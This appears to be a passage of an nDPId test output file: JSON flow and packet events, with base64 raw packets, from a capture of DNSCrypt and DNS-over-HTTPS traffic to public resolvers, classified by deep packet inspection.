KyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf
6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5euuv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="} 
-01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"thread_ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01muRMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeuQtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHdsHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDs
zY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0eyUs26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqBB5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0
cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="} -01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4c
SyaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrq